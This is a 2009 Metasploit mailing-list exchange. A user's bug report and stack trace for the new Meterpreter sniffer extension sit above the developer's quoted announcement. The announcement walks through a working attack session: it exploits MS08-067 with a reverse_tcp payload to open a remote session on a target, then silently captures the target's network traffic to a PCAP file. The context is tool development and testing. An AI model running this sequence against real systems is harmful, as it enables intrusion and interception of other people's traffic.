Meterpreter Sniffer module

[xyberpix at xyberpix.com (xyberpix)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey HD,

Just did a quick test, and it barfed on me, dunno though whether this  
is the code, or my setup. Running on OS X 10.5.7, with Mac Port  
installed.

meterpreter > use sniffer
Loading extension sniffer...[-]
failure: No response was received to the core_loadlib request. /Users/ 
xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/client_core.rb: 
157:in `use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:266:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:254:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ 
command_dispatcher/core.rb:254:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 
94:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 
60:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 
58:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb: 
181:in `_interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in  
`interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/command_dispatcher/ 
core.rb:997:in `cmd_sessions'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 
191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter >


xyberpix

On 11 Jul 2009, at 15:38, HD Moore wrote:

> I committed a test version of the sniffer extension to the SVN  
> trunk. The module in SVN is compiled with debug support, so you  
> should see lots of verbose debug prints if you attach a debugger to  
> the process where meterpreter is running. I could use some help  
> testing this new extension; so far it looks like there are some  
> cases where the "use sniffer" command fails (exploiting ms03-026 on  
> win2003 sp0), but there may be others as well.
>
>
> To obtain the latest version of Metasploit on UNIX platforms:
>  $ svn co https://metasploit.com/svn/framework3/trunk/
>
> To obtain the latest version of Metasploit on Windows:
>  1. Download https://metasploit.com/framework-3.3-dev.exe
>  2. Execute this and extract the framework to a directory
>  3. Inside the extracted directory execute msfupdate.bat
>  4. Inside the extracted directory execute msfconsole.bat
>
> This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we  
> have a license), it can sniff packets from the target system without  
> writing to the filesystem or installing any drivers. The module  
> automatically excludes its own control traffic from the packet  
> capture. As of this week, all Meterpeter communication is now  
> protected by TLS/SSL, including the packet sniffer data.
>
> To get started with the new module:
>
> msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/ 
> reverse_tcp
> msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
> msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
> msf exploit(ms08_067_netapi) > exploit
>
> [*] Handler binding to LHOST 0.0.0.0
> [*] Started reverse handler
> [*] Triggering the vulnerability...
> [*] Transmitting intermediate stager for over-sized stage...(216  
> bytes)
> [*] Sending stage (205824 bytes)
> [*] Meterpreter session 1 opened (192.168.0.139:4444 ->  
> 192.168.0.120:1687)
>
> meterpreter > use sniffer
> Loading extension sniffer...success.
>
> meterpreter > help
> [snip]
> Sniffer Commands
> ================
>
>    Command             Description
>    -------             -----------
>    sniffer_dump        Retrieve captured packet data
>    sniffer_interfaces  List all remote sniffable interfaces
>    sniffer_start       Capture packets on a previously opened  
> interface
>    sniffer_stats       View statistics of an active capture
>    sniffer_stop        Stop packet captures on the specified interface
>
> meterpreter > sniffer_interfaces
>
> 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514  
> usable:true dhcp:true wifi:false )
>
> meterpreter > sniffer_start 1
> [*] Capture started on interface 1 (200000 packet buffer)
>
> meterpreter > sniffer_dump 1 /tmp/all.cap
> [*] Dumping packets from interface 1...
> [*] Wrote 6 packets to PCAP file /tmp/all.cap
>
> meterpreter > sniffer_dump 1 /tmp/all.cap
> [*] Dumping packets from interface 1...
> [*] Wrote 31 packets to PCAP file /tmp/all.cap
>
> The sniffer_dump command will append to an existing PCAP or create a  
> new one.
>
> -HD
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkpYptUACgkQ0IPlrIA4qxpfUwCaAiLcu+nmcRSH3CT1wkHtdxE3
YzoAn3WFO5UJTcrejiIsoPswYTadzigN
=beiw
-----END PGP SIGNATURE-----